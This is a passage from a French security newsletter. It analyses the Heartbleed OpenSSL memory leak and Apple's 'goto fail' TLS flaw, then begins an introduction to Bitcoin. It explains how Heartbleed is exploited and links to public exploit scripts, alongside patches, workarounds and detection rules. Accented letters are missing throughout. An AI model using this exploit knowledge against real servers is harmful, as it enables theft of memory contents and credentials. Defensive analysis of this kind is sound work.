Voici une partie du code qui permet lenvoi dune rponse
de type Heartbeat_response :
Le pointeur bp pointe sur le dbut du message de rponse.
Le type du message (TLS1_HB_RESPONSE) est assign bp
(1er octet) puis bp est incrment dun octet. La macro s2n
stocke la taille du payload (payload_length) dans la va-
riable payload soit 64Ko alors quen vrit cette taille nest
que dun octet. On incrmente le pointeur de 2 octets et on
copie payload (64Ko) octets de donnes grce la fonction
memcpy().
HeartBleed - CVE-2014-0160
Lmetteur dun message de type Heartbeat contrle le
champ payload_length. Cependant, dans le code de la fonc-
tion grant la rception des messages, il ny a aucune v-
rication, ce qui permet lattaquant de lire une partie de
la mmoire du serveur (maximum 64Ko). Rappelons que
dans un contexte classique le serveur recevant le message
renvoie exactement le mme contenu du payload reu.
Un attaquant envoie un message Heartbeat dune taille de
4 octets (c..d. 1 octet de payload, car rappelons-le le type
est cod sur un octet, et la taille du payload sur 16bits = 2
octets, ce qui fait 1 + 2 +1 = 4 octets). Seulement lattaquant
a menti sur la taille du payload en renseignant 65535 octets
(cf. Requte Heartbeat dans lillustration).
Du ct du serveur recevant le message, il ny a pas de v-
rication sur la taille de la structure SSLv3. Il lit alors di-
rectement la taille du payload qui est de 64Ko. Le serveur
renvoie alors un payload contenant 64Ko de donnes pr-
sentes dans la mmoire du serveur (au lieu de 1 octet).
Ceci permet de lire des mots de passe en clair ou dautres
informations sensibles.
Plus en dtails
La fonction qui gre la rception des messages de type
Heartbeat est la suivante (dtls1_process_heartbeat pr-
sente dans le chier ssl/d1_both.c), dont voici un extrait :
Dans un premier temps, le pointeur p est initialis ladresse
du dbut du message Heartbeat reu. partir de celui-ci, le
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
47
Ainsi, en envoyant un message contenant un payload d1
octet avec une taille (payload_length) indique 64Ko, un
attaquant est en mesure dobtenir les donnes prsentes
en mmoire.
Une solution possible est de vrier la taille du payload de
la faon suivante :
La condition permet de vrier si la taille relle du payload
reu depuis le rseau correspond la taille donne dans le
champ conu pour. La vrication de la taille est faite grce :
+
loctet codant le type du message (le 1 prsent
dans la ligne) ;
+
aux 2 octets codant la taille du payload (le 2 );
+
aux 16 octets faisant rfrences la taille du padding
(le 16 );
+
la variable payload renvoyant la taille relle du pay-
load reu.
Les codes dexploitations disponibles publiquement
Le premier code dexploitation [13] a t divulgu dans les
heures qui ont suivi la prsentation de la vulnrabilit. Il
prend la forme dun script en Python. Il permet denvoyer
deux messages an dtablir la connexion SSL : un paquet
hello , puis un paquet heartbeat .
Dans le cas o lexploitation russit, le contenu de la m-
moire du serveur est prsent la manire dun dump
hexdump .

Une seconde version [14] de ce script permettant de tester
les serveurs STARTTLS [15] a ensuite fait son apparition sur
Internet.
Enn, un code dexploitation a t publi au sein du
Framework Metasploit [16].
> INFO
La vulnrabilit Heartbleed utilise an de drober
les sessions VPN
La socit Mandiant, spcialise dans le domaine de la rponse
incident, a dtaill comment un attaquant avait russi ex-
ploiter la vulnrabilit Heartbleed an de se connecter sur le VPN
dun de ses clients.
Lattaquant a exploit la vulnrabilit Heartbleed (voir CXA-2014-
1142) sur le concentrateur VPN de la socit victime. De cette
manire, il a pu rcuprer en mmoire des jetons de sessions
actives sur le concentrateur VPN. Lattaquant a ainsi usurp les
sessions VPN valides et a rebondi sur le systme dinformation
de la socit.
Lincident a pu tre dtect grce aux signatures des sondes IDS
et aux traces des concentrateurs VPN. Les sondes IDS intgraient
en effet les signatures de lattaque Heartbleed et ont enregistr
17 000 requtes malveillantes ayant pour objectif de rcuprer
les sessions en mmoire.
Quant aux logs VPN, ils ont montr que certaines sessions trans-
mettaient simultanment des requtes provenant de plusieurs
IP diffrentes. Cela montre que lattaquant a usurp ces sessions
et les utilisait pour accder au systme dinformation de lentre-
prise victime.
Cet article de la socit Mandiant souligne la ncessit pour une
entreprise dappliquer rapidement les correctifs de la vulnrabi-
lit Heartbleed sur lensemble de son primtre, dimplmenter
les signatures IDS adquates et de vrier dans les traces des
quipements sensibles si diffrentes IP nont pas partag simul-
tanment la mme session. En effet, ce signe est lindicateur de
la possible usurpation dune session.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
48
Comment savoir si mon systme est vulnrable ou
pas?
Nous avons intgr une nouvelle fonctionnalit au sein de
notre service de Cyber-surveillance [17] an dvaluer si la
vulnrabilit impacte les ressources de nos clients, de fa-
on automatique, sur des primtres tendus exposs sur
Internet.
Plusieurs outils ont galement t mis votre disposition
[17a] :
+
Hut3 Cardiac Arrest
https://gist.github.com/ah8r/10632982 ;
+
SSLLabs de Qualys
https://www.ssllabs.com/ssltest/index.html ;
+
Nmap (script ssl-heartbleed.nse) [17b] ;
+
Nessus
http://www.tenable.com/plugins/index.php?view=-
single&id=73412 ;
+
Deux sites :
http://lippo.io/Heartbleed/ ;
http://possible.lv/tools/hb/
Comment sen protger ?
Pour commencer, il est ncessaire de savoir quels sont les
systmes impacts par cette faille. Comme nous lexpli-
quions auparavant, seuls les serveurs utilisant une version
dOpenSSL 1.0.1 (antrieure 1.0.1g) sont vulnrables [18].
La commande suivante vous permet de connatre la version
installe sur votre systme :
$> openssl version
OpenSSL 0.9.8y 5 Feb 2013
Attention tout de mme ne pas tomber dans deux piges :
+
OpenSSL peut tre compil en statique au sein dun logi-
ciel, auquel cas, la commande prcdente ne retourne pas
forcment la bonne information;
+
lensemble des serveurs sappuyant sur une version
dOpenSSL est affect, pas uniquement les serveurs Web
(HTTPS). Les serveurs IMAPS, FTPS, ou encore POP3S sont
aussi concerns.
Dans le cas o une version vulnrable est utilise, plusieurs
possibilits soffrent vous :
+
appliquer le correctif en priorit (OpenSSL 1.0.1g) [18a];
+
ou, mettre en uvre des solutions de contournement.
Plusieurs distributions Linux ont mis disposition un correc-
tif de scurit ds la divulgation de la faille : RedHat, Centos,
Debian, Ubuntu.
Les solutions de contournement
La premire consiste recompiler OpenSSL avec loption
-DOPENSSL_NO_HEARTBEATS pour dsactiver le support de
lextension HeartBeat.
La deuxime consiste modier la conguration dun ser-
veur an de dsactiver le support de TLS.
Enn, une dernire solution de contournement a t
propose aux utilisateurs de lIDS/IPS Suricata. Celle-ci est
disponible ladresse suivante :
http://blog.inliniac.net/2014/04/08/detec-
ting-openssl-heartbleed-with-suricata/
Des rgles similaires existent pour lIDS Snort de SourceFire
(SIDs compris entre 30510 et 30517) :
http://vrt-blog.snort.org/2014/04/heartbleed-memory-dis-
closure-upgrade.html
Les recommandations du CERT-XMCO
Sur une chelle de 1 10, on peut donc catgoriser cette
vulnrabilit 11, indiquait Bruce Schneier [21]. Aprs les
rcents dboires de GnuTLS ou du GotoFail dApple, SSL est
clairement sous pression.
Daprs des chercheurs, environ 17% des serveurs web
utilisant des certicats SSL seraient vulnrables. Ce chiffre
peut paratre faible, mais il est comprhensible pour deux
raisons:
+
seuls les serveurs utilisant le TLS/DTLS sont vulnrables ;
+
seules les versions 1.0.1 1.0.1f et 1.0.2beta sont vul-
nrables ; or cette version na t adopte que trs rcem-
ment.
Cependant, il nen reste pas moins que pour XMCO, il faut
considrer que toutes les informations sensibles ayant tran-
sit sur des serveurs vulnrables ont t potentiellement
compromises.
La rvocation des anciens certicats SSL et leur remplace-
ment sont donc des mesures envisager, avant de procder
au renouvellement des mots de passe des utilisateurs.
HeartBleed - CVE-2014-0160
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
49

Et la suite ?
Des chercheurs ont montr que les serveurs ntaient
pas les seuls composants vulnrables. Les clients utilisant
OpenSSL [22] le sont aussi. Un exploit a dailleurs t publi.
Suite lensemble des rvlations dEdward Snowden, on
peut sinterroger sur cette vulnrabilit. Des lments poin-
ts du doigt par lEFF [23] laissent penser que cette vulnra-
bilit a t exploite en novembre 2013.
Rfrences
+
[1] https://gotofail.com/
+
[2] https://www.openssl.org/
+
[3]http://tools.ietf.org/html/rfc6520#page-3
http://tools.ietf.org/html/rfc5847#page-6
+
[4] https://web.nvd.nist.gov/view/vuln/detail?vul-
nId=CVE-2014-0160
+
[5] https://www.openssl.org/news/secadv_20140407.
txt
+
[6] http://heartbleed.com/
+
[7] http://git.openssl.org/gitweb/?p=openssl.
git;a=commitdiff;h=96db902
+
[8] https://www.cert./en/reports/2014/vulnerabi-
lity788210.html
+
[9] http://aws.amazon.com/fr/security/security-bulle-
tins/heartbleed-bug-concern/
+
[10] http://aws.amazon.com/fr/security/security-bul-
letins/aws-services-updated-to-address-openssl-vulnerabi-
lity/
+
[11] http://blog.cloudare.com/
staying-ahead-of-openssl-vulnerabilities
+
[12] Illustration de la faille
+
[13] https://gist.github.com/sh1n0b1/10100394
+
[13a] https://twitter.com/1njected/sta-
tus/453797877672706048
+
[13b] https://twitter.com/moyix/sta-
tus/453760960671383552/photo/1
+
[14] https://gist.github.com/takeshixx/10107280
+
[15] http://en.wikipedia.org/wiki/STARTTLS
+
[16] https://github.com/rapid7/metasploit-framework/
blob/ccdc5bd28187ba393407944ba54452df850f361f/mo-
dules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+
[17] http://www.xmco.fr/cyber-surveillance.html
+
[17a] http://www.hut3.net/blog/cns---networks-secu-
rity/2014/04/14/bugs-in-heartbleed-detection-scripts-
+
[17b] https://svn.nmap.org/nmap/scripts/ssl-
heartbleed.nse
+
[18] En ralit, la version dOpenSSL 1.0.2 (antrieure
1.0.2-beta1) est aussi vulnrable, mais sagissant dune
version en cours de dveloppement, elle ne devrait pas tre
utilise en production.
+
[18a] https://www.openssl.org/source/
+
[19] https://httpd.apache.org/docs/2.2/ssl/ssl_howto.
html
+
[20] http://seclists.org/fulldisclosure/2014/Apr/109
+
[21] http://schneier.com/blog/archives/2014/04/
heartbleed.html
+
[22] https://github.com/rapid7/metasploit-framework/
blob/c0e682b5182fe429ad21d0fceb3456fffa7bc0c2/mo-
dules/auxiliary/server/openssl_heartbeat_client_memory.
rb
+
[23] httpshttps://www.eff.org/deeplinks/2014/04/
wild-heart-were-intelligence-agencies-using-heartbleed-
november-2013
+
Autres liens
http://blog.xmco.fr/index.php?post/2014/04/11/
HeartBleed%2C-la-faille-qui-touche-au-coeur-la-suite-
OpenSSL
http://blog.existentialize.com/diagnosis-of-the-openssl-
heartbleed-bug.html
http://www.theregister.co.uk/2014/04/09/heartbleed_ex-
plained/
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
50
Apple et SSL : analyse de la
vulnrabilit CVE-2014-1266
par David WEBER
Introduction
Il y a quelques mois, Apple a t sous le feu des projecteurs
avec la dcouverte dune vulnrabilit affectant plusieurs
produits de la marque. Depuis, un correctif a t publi par
Apple an de corriger cette vulnrabilit.
Rfrence CVE-2014-1266 au dbut de lanne 2014, la
faille de scurit provenait de limplmentation du proto-
cole SSL/TLS visant scuriser les communications des ap-
pareils avec lextrieur. Cest notamment sur ce protocole
que repose le protocole HTTPS (HTTP over SSL).
Depuis, mdias et blogs ont relay linformation en faisant
tat dune faille de scurit importante, majeure, voire
critique ! et sempressant danalyser la fameuse erreur
goto fail .
Mais quen est-il rellement ? Quel tait limpact rel de
cette vulnrabilit ? Etait-elle vraiment critique ? Cest ces
questions que nous rpondrons dans cet article.
Consquences de la vulnrabilit
Le protocole TLS (et son prdcesseur SSL) a t cr pour
protger les donnes envoyes au travers dun rseau
tranger non maitris (tel quInternet).
Pour faire simple, linstar dun trsor quon placerait dans
un coffre ferm cl, TLS va protger les donnes envoyes
laide dune cl cryptographique qui sera transmise de
manire scurise au destinataire :

De cette manire, seuls les possesseurs de cette cl seront
C
o
r
y

D
o
c
t
o
r
o
w
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
51
en mesure de lire les donnes protges. Pour que ce m-
canisme soit efcace, il est ncessaire :
+
De transmettre la cl de manire scurise ;
+
De vrier lidentit du destinataire. Cest sur ce dernier
point que limplmentation du protocole SSL/TLS dApple
tait faillible.
En temps normal, si lidentit du destinataire nest pas ga-
rantie, la communication avec ce dernier na pas lieu ou un
message derreur est prsent lutilisateur :
Dans ce cas de gure, linternaute peut choisir dignorer
lavertissement et dtablir la communication. Cette der-
nire sera alors bien protge mais lidentit du serveur
distant ne sera pas vrie :
La faille de scurit dont il est question dans cet article fait
que dans certains cas, lidentit du destinataire nest pas
vrie.
Un pirate peut alors usurper lidentit du destinataire lin-
su de linternaute, et ce, de manire intercepter les com-
munications. Ce type dattaque est communment appel
Man in the Middle (ou lhomme du milieu):

Ainsi, les mots de passe, coordonnes bancaires et autres
informations sensibles peuvent tre voles linsu dun in-
ternaute.
Un pirate peut alors
usurper lidentit du destinataire
linsu de linternaute, et ce,
de manire intercepter
les communications.
Bien que dans la thorie, lattaque de Man-in-the-
Middle semble redoutable, la ralit fait quelle nest r-
alisable que depuis un rseau local. En dautres termes, la
probabilit quun internaute naviguant depuis sa connexion
internet personnelle soit victime dune telle attaque est
proche de nulle.
En revanche, cette attaque est ralisable depuis un rseau
public (Hotspot WiFi, Rseau dentreprise, etc.).
Produits concerns
Cette vulnrabilit affecte tous les produits de la marque
Apple qui nont pas reus le correctif adquat, savoir :
+
Apple iOS 6.x < 6.1.6 (iPhone, iPod et iPad) ;
+
Apple iOS 7.x < 7.0.6 (iPhone, iPod et iPad) ;
+
Apple TV 6.x < 6.0.2 ;
+
Apple OS X 10.9.x < 10.9.2.
Plus particulirement, cette vulnrabilit concerne tous les
logiciels bass sur limplmentation SSL/TLS dApple (Mail,
Safari, Calendar, etc) ; le corollaire de ce fait est que les lo-
giciels qui nutilisent pas limplmentation SSL/TLS dApple
ne sont pas concerns ; ce qui est le cas pour les naviga-
teurs Chrome et Firefox.
Apple vs SSL
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
52
Analyse de la vulnrabilit
Linitialisation dune connexion scurise avec SSL/TLS est
ralise par une procdure appele Handshake (ou poi-
gne de main) entre le serveur et le client. Durant cette
procdure les cls cryptographiques visant scuriser la
communication sont changes et lidentit des parties est
vrie.
Le schma ci-dessus illustre les changes entre un serveur
et un client durant une procdure de Handshake :
1. Initialisation de lchange.
2. Envoi de la chaine de certicats du serveur ainsi que des
messages complmentaires pour lchange des cls cryp-
tographiques.
3. Vrication de lidentit du serveur et envoi de messages
complmentaires pour lchange des cls cryptographiques.
4. Mise jour de la session SSL des deux parties. Fin du
Handshake ; dmarrage dune communication scurise
avec la nouvelle session SSL.
Lidentit du serveur est vrie par le client avant lenvoi
du message client_key_exchange .
A la rception du message server_key_exchange , la si-
gnature de ce dernier est vrie ; suite cela, la paire de
cls cryptographiques du client qui sera utilise pour scuri-
ser la communication est initialise :
Dans limplmentation SSL/TLS dApple, lidentit du ser-
veur distant est vrie en mme temps que la vrication
de la signature du message server_key_exchange .
La faille de scurit rfrence CVE-2014-1266 provient
dune erreur de dveloppement au sein de la fonction SSL-
VerifySignedServerKeyExchange du chier sslKeyExchange.c
[2] :
Comme lillustre la capture ci-dessus, 2 phrases goto
fail; ont t crites lune la suite de lautre.
Une instruction goto , comme son nom lindique, permet
de modier la position du ot dexcution dun programme.
Dans le cas ci-dessus, la premire instruction goto est
rendue conditionnelle par linstruction if la prcdent ;
ce qui nest pas le cas de la seconde, malgr lindentation
trompeuse du code.
Cette erreur a pour consquence de transformer le code qui
la succde en code mort . Ainsi la fonction sslRawVerify
ne sera jamais excute ; cest cette fonction qui est en
charge de vrier la signature des donnes changes, et
par la mme occasion lidentit du serveur distant.
Conclusion
Maintenant corrige, la vulnrabilit rfrence CVE-2014-
1266 tait importante. En effet, elle permettait de mettre
mal le protocole TLS/SSL utilis effectuer des changes
scuriss travers internet. Cependant lexploitation de
cette vulnrabilit tait difcile ; elle obligeait notamment
lattaquant tre connect au mme rseau que sa ou ses
victimes.
La prsence dune telle vulnrabilit au sein du code source
dApple soulve de nombreuses questions sagit-il dune
simple erreur de dveloppement ou dune porte drobe
ajoute volontairement ?
A premire vue, linstruction goto lorigine de la faille
de scurit ressemble une simple erreur de copier/coller.
Cependant, en tudiant lvolution du code source dApple,
linstruction dont il est question ici semble sortir de nulle
part [3] :
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
53

Sil sagit bien dune porte drobe, pour qui tait-elle des-
tine ? Apple ? La NSA ? Peut-tre que les rvlations dEd-
ward Snowden nous donneront un jour les rponses ces
questions.
References
+
[1] http://support.apple.com/kb/HT6150
+
[2] http://opensource.apple.com/source/Security/Secu-
rity-55471/libsecurity_ssl/lib/sslKeyExchange.c
+
[3] https://gist.github.com/alexyakoubian/9151610/
revisions
Apple vs SSL
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
54
> Bitcoin, par ici la monnaie !
Entre rvolution montaire et op numrique, il ny a quun
pas. Bitcoin est rapidement devenu un vritable phno-
mne attirant des millions dutilisateurs et engendrant de
nombreux questionnements la fois conomiques et juri-
diques. Quen est-il en ralit ?
> Quest-ce que (le) Bitcoin ?
Le terme dsigne deux notions :
+
dune part un systme indpendant de paiement (Bit-
coin);
+
dautre part une unit montaire entirement dmat-
rialise (un / des bitcoin(s)) stocke sur des portefeuilles
lectroniques.
Bitcoin est donc une implmentation du concept de cryp-
tomonnaie. Mais avant de prsenter plus en dtail le fonc-
tionnement, tablissons un rapide historique.
Lide dorigine (sans parler du concept b-money de Wei
Dai en 1999) daterait de 2007. Le livre blanc Bitcoin:
Peer-to-peer Electronic Cash System a t publi en 2008,
cependant la vritable identit de son auteur reste encore
une nigme. Satoshi Nakamoto est le pseudonyme de la
personne (ou du groupe) ayant cr Bitcoin, ainsi que le
logiciel li Bitcoin-Qt (crit en C++).
Personne ne sait de qui il sagit en ralit et bon nombre
de rumeurs se dveloppent autour de ce mythe . Tantt
il sagirait dun informaticien amricain nomm Nick Sza-
bo, tantt dun japonais de 37 ans, ou pour dautres, dun
projet de la NSA. Cet anonymat semble la fois bnque
au crateur qui possderait une vritable fortune et dsire-
rait, peut-tre, vivre tranquillement. Mais aussi Bitcoin qui
prote de la publicit gnre par toutes ces thories pour
accroitre sa popularit. Mais est-ce vraiment si important ?
Bitcoin a trois particularits :
+
la premire est le nombre limit dunits existantes (21
millions dont 12 millions seraient dj en circulation). Selon
la communaut et les crateurs, il est impossible de prvoir
avec exactitude ce qui se passera une fois la totalit gn-
re. En ce sens, il sagit dune vritable exprience originale
en termes conomiques, constituant une sorte de mise
lpreuve des thses montaires ;
+
la seconde est sa volatilit extrme, pouvant passer de
250$ 1000$ en quelques jours ;
+
la troisime est le mode dacquisition des bitcoins, ap-
pel le mining .
Les Bitcoins
par Arnaud REYGNAUD
Z
a
c
h

C
o
p
l
e
y
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
55
3 communauts, 3 points de vue
Bitcoin peut se rsumer selon 3 points de vue :
+
Particuliers
Un moyen simple de paiement. Il se prtend la fois s-
curis, fonctionnel tout moment et sur lensemble de la
plante. De plus, les frais de transactions se veulent mi-
nimes et lidentit de lutilisateur nest pas ncessaire pour
les changes (anonymisation). Pour un particulier, il suft
dune simple application mobile ou dun logiciel fournissant
un portefeuille personnel an dchanger des bitcoins.
+
Entreprises
Il est prsent comme ayant les frais les plus bas du mar-
ch, protgeant des fraudes (contrairement PayPal ou aux
cartes de crdit classiques). Les transferts internationaux
(mme pour des montants levs) ne ncessitent aucun
dlai, ni mme la mise en oeuvre des normes de scurit
PCI. Tout comme pour les particuliers, un simple logiciel suf-
t an dtablir un portefeuille.
+
Dveloppeurs
Enn du ct des dveloppeurs, il sagit du plus simple des
systmes de paiement offrant plusieurs API tierces. Il est
scuris, bon march et intgrable facilement au sein des
applications. Nimporte quel dveloppeur peut ainsi sap-
puyer sur le concept et proter de tous ses avantages.
Cest ainsi quest dcrit Bitcoin. Tout semble donc parfait
si lon se limite ces dnitions, mais que se cache-t-il en
ralit derrire tout ceci ? Cette question peut tre dvelop-
pe en prsentant les acteurs du systme.
Qui sont les acteurs ?
Il convient de diffrencier les diffrents utilisateurs directs
comme indirects du Bitcoin :
+
les utilisateurs classiques qui vont acheter contre de
vraies devises des bitcoins (il leur est ensuite possible de
dpenser ou revendre ces derniers selon le cours) ;
+
des banques souvent spcialises (qui pour cer-
taines font faillite et qui disparaissent avec des millions en
bitcoins comme si de rien ntait) ;
+
des sites marchands protant des irrgularits du bitcoin
pour casser les prix et donc drguler les marchs ;
+
des vendeurs de bitcoins qui font tournoyer le cours de
la monnaie;
Satoshi Nakamoto est le pseudonyme
de la personne (ou du groupe)
ayant cr Bitcoin, ainsi que le logiciel li
Bitcoin-Qt (crit en C++)
+
des mineurs (des utilisateurs un peu particuliers qui g-
nrent des bitcoins et valident les transactions en rsolvant
des problmes cryptographiques, tout en rcoltant les frais
des oprations traites). La concurrence entre mineurs est
donc leve ;
+
des pirates qui sattaquent aux portefeuilles des inter-
nautes ou minent travers des quipements non ddis ;
+
sans omettre les tats qui, tant bien que mal, tentent
dencadrer le Bitcoin.
Le rseau Bitcoin, tout comme la technologie lie, nap-
partiennent personne. Les utilisateurs au sens large le
contrlent et sont interdpendants les uns des autres. Cette
absence apparente de hirarchie apparat comme lune des
principales forces du Bitcoin.
> INFO
Le statut des monnaies virtuelles actuellement
ltude aux tats-Unis
Google a dcid de retirer les applications illgitimes permet-
tant de miner des bitcoin ou toute autre monnaie virtuelle
disponible au travers du Google Play.
Cinq fausses applications de fonds dcran anims ont ainsi
t supprimes. Le malware prsent au sein des logiciels se
nomme BadLepricon et semble prsenter des similarits avec
CoinKrypt.
Dans un rapport parallle, les chercheurs de chez Kaspersky
Lab ont rvl avoir dcouvert prs de 6 millions de logiciels
malveillants lis Bitcoin en 2013. Ce type dannonce d-
montre lessor des crypto-monnaies.
Enn, une tude datant de fvrier dernier explique quil est
extrmement difcile dtre rentable en ralisant du mi-
ning. Dans cette optique, la compromission dappareils
mobiles, mme en masse, ne peut rivaliser avec des serveurs
ddis.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
56
> Principes et Aspects Techniques
Concept Gnral
Comme voqu sur le blog de XMCO ( Le Bitcoin, une mon-
naie virtuelle intraable du 6 Dcembre 2013 [1]), les bit-
coins se transfrent directement entre utilisateurs, sans ac-
teur intermdiaire bancaire. Cela apporte plusieurs atouts :
+
limpossibilit dtre banni du systme Bitcoin (quiva-
lent une interdiction bancaire) ;
+
la limitation des frais ;
+
il ny a pas besoin de suivre des limites arbitraires.
Les Bitcoins sont changs sur le rseau de faon anonyme
puisque lensemble des oprations repose sur lutilisation
de la cryptographie asymtrique, masquant ainsi lidentit
des internautes. Autre caractristique : les transactions r-
alises ne peuvent tre traces. Enn, le systme derrire
Bitcoin est entirement Open Source, de telle faon que
nimporte qui puisse vrier la scurit des outils.
Ils peuvent tre stocks sur un ordinateur, un smartphone,
un support amovible, une carte de crdit, une tierce partie,
etc. Chacun prsentant ses avantages et inconvnients (la
problmatique principale rsultant de lopposition simplici-
t VS scurit).
Comment sont gnrs les bitcoins ?
Pour rappel, cest en minant que les utilisateurs pro-
duisent des devises. Les mineurs sont aujourdhui regrou-
ps en coopratives an de fournir une puissance de calcul
suprieure et rsoudre davantage dquations mathma-
tiques pour la communaut Bitcoin. Il nest donc plus pos-
sible de gnrer efcacement des units de manire iso-
le. En somme, plus le nombre de bitcoins prsents sur le
rseau est important, plus il est long et difcile de miner.
Les mineurs sont galement utiliss an de conrmer les
transactions en attente (tout en incluant les prcdentes
dans la chaine de blocs). Cette opration rpond un ordre
chronologique permettant de protger la chaine et de ga-
rantir la stabilit ainsi que la neutralit du systme.
Ils rcoltent grce leur travail des revenus proportionnels
au nombre de calculs effectus. Initialement le montant
tait de 50 bitcoins par bloc gnr. Cependant cette rcom-
pense est divise par deux tous les 4 ans an de rpondre
laugmentation du nombre de bitcoins disponibles.
Trois lments sont donc essentiels an de gnrer des bit-
coins :
+
du matriel. Initialement des CPUs taient utiliss, puis
des GPUs. Dsormais des circuits lectroniques spcialiss
de type ASICs (Application-Specic Integrated Circuit) rem-
plissent ce rle ;
+
des logiciels de mining destins rsoudre des pro-
blmes mathmatiques complexes ;
+
un minimum de connaissances techniques et ventuel-
lement conomiques ;
+
du temps, et de la place
Comment fonctionne une transaction ?

Une transaction est un transfert de valeur entre les porte-
feuilles qui sera inclus dans ce que lon nomme chaine
de blocs (plus communment cela quivaut un livre
de comptes). Un portefeuille garde une cl prive qui est
utilise an de signer des transactions en fournissant une
preuve mathmatique. La signature empche lopration
dtre modie une fois celle-ci ralise. Toutes les transac-
tions sont ensuite diffuses entre les utilisateurs et valides
par le rseau (et les mineurs) dans les 10 minutes.
An dexpliquer cela, prenons un cas dtude avec les ter-
nels Alice et Bob.
Synopsis : Alice veut acheter un produit Bob qui possde
une boutique en ligne acceptant les bitcoins.
Lopration va se drouler en 3 grandes tapes :
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
57
tape 1 : Gnration des portefeuilles et des adresses
Cette premire tape se fait trs simplement en ouvrant un
nouveau portefeuille via des sites ou logiciels ddis (sur
ordinateur ou mobile). Il suft en gnral dune adresse
mail faisant ofce didentiant et dun mot de passe an de
crer un compte.
+
Un portefeuille est un chier ou un ensemble de chiers
donnant accs de multiples adresses.
+
Une adresse est une simple chaine de caractres (lettres
et chiffres) reprsentant un solde de bitcoins et ddie
une transaction. Un utilisateur peut en crer autant quil
le souhaite. Il est dailleurs conseill den crer une par
transaction an de renforcer la protection des utilisateurs.
Plus en dtail, il sagit dun hash utilisant lalgorithme RI-
PEMD-160.
Bob va donc gnrer une adresse pour Alice an de recevoir
le paiement. Cette opration se fait en gnrant une paire
de cls (prive et publique). La nouvelle adresse cre re-
prsente une unique cl publique et la cl prive correspon-
dante est stocke dans le portefeuille de Bob.
tape 2 : Ralisation du paiement
Alice va utiliser son client bitcoin an de transfrer vers
ladresse cre par Bob le montant de la transaction. Lop-
ration est transparente pour Alice comme pour Bob.
+
Pour ce faire, Alice signe la transaction (requte) avec
la cl prive lie ladresse en cours dutilisation contenue
dans son portefeuille (une adresse = une cl).
+
Nimporte quel utilisateur sur le rseau peut ensuite uti-
liser la cl publique dAlice an de vrier la transaction
(cela permet de prouver la lgitimit dune transaction).
+
La transaction est envoye aux mineurs travers un
journal de transactions comprenant les cls publiques
dAlice et Bob, le montant de la transaction et la date.
La transaction est ainsi enregistre dans le portefeuille
dAlice sous la forme dune empreinte cryptographique.
Pour chaque transaction, une signature lectronique unique
est ainsi ajoute. Ladresse de lutilisateur recevant les bit-
coins prend galement la forme dune empreinte crypto-
graphique, correspondant au hash de la cl publique de
lutilisateur.
tape 3 : Vrication de la transaction
Les mineurs entrent ici en jeu. laide de leurs quipe-
ments et logiciels, ils regroupent les transactions effectues
sur les 10 dernires minutes dans un bloc ( transaction
block ). Ils calculent ensuite le hash de ce mme bloc.
Cette opration est une course contre la montre dans la-
quelle le premier mineur rsoudre le problme cryptogra-
phique touchera sa commission . Un mme bitcoin ne
peut tre renvoy plusieurs fois, car les mineurs vrient
dans le journal des transactions qui est le dernier dtenteur
du bitcoin en question.
Les Bitcoins sont changs
sur le rseau de faon anonyme
puisque lensemble
des oprations repose sur lutilisation
de la cryptographique asymtrique,
masquant ainsi lidentit des internautes
Une transaction est donc vrie par un mineur puis stoc-
ke de manire anonyme et permanente travers le r-
seau (sur les nuds de ce dernier). Chaque transaction est
ainsi consigne dans une chaine de blocs partage sur
le rseau. Lauthenticit de chacune est galement prot-
ge par des signatures numriques qui correspondent aux
adresses mettrices. Cette partie sera dtaille dans la pro-
chaine section.
Le transfert de Alice vers Bob est donc rattach dautres
transactions avant dtre sign et diffus sur le rseau puis
submerg par dautres transactions. Si une personne sou-
haitait le modier, il faudrait faire le travail inverse puis
refaire celui de tous les mineurs ultrieurs. Cela apparat
comme une opration actuellement impossible.
Prsentation du Bitcoin
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
58
naison de 3 lments :
o len-tte du prcdent bloc (engendrant le principe
de chaine) ;
o nouveau bloc ;
o et le nonce .
+
La valeur du nouveau hash doit correspondre une no-
menclature particulire (commencer par un certain nombre
de 0 et tre infrieur ou gal au numro de la cible).
Nayant aucune solution an de prdire la valeur dun hash,
les mineurs doivent les rgnrer jusqu en obtenir un cor-
respondant au schma recherch (avec diffrents sels).
Quest-ce que la cible ?
Il sagit dun nombre modi tous les 2016 blocs (ou toutes
les 2 semaines) par chacun des clients connects au rseau
Bitcoin. Le niveau de complexit est chaque fois rva-
lu an de rendre le prochain hash plus facile ou difcile
trouver. Cette rvaluation est ncessaire an de garder
un temps de cration de blocs dau moins 10 min malgr
lamlioration des solutions de minage.
La chaine se poursuit ainsi ajoutant un nouveau maillon
chaque nouvelle itration.
Les transactions sont ainsi packages dans un bloc qui r-
pond des rgles cryptographiques strictes vries par le
rseau. Ces rgles empchent les blocs prcdents dtre
modis, car cela invaliderait tous les blocs suivants. Lajout
de nouveaux blocs conscutivement dans la chaine de
blocs est galement surveill an de prvenir des abus. De
cette faon, aucun des individus ne peut contrler ce qui
est inclus dans la chaine ou remplacer des maillons an de
modier la valeur dun portefeuille.
Explication de la chaine de blocs

La chaine de blocs est considre comme un livre de
comptes sur lequel lensemble du rseau Bitcoin repose ou
encore comme une base de donnes en constante volu-
tion. Toutes les transactions conrmes sont incluses dans
ce livre. De cette faon, les portefeuilles peuvent calculer
le solde de leurs comptes et de nouvelles oprations
peuvent tre vries. Lintgrit et la chronologie de la
chaine sont quant elles garanties par des mcanismes
cryptographiques.
Quelques informations an de mieux comprendre le
fonctionnement de cette chaine :
+
Une fonction de hash est utilise an de transformer
les donnes en une chaine alphanumrique de taille xe
(SHA-256).
+
An de crer diffrentes valeurs de hash pour une mme
donne, Bitcoin utilise le concept de nonces (quivalent
un sel). Il sagit dun nombre pseudo-alatoire ajout aux
donnes avant de passer dans la fonction de hash.
+
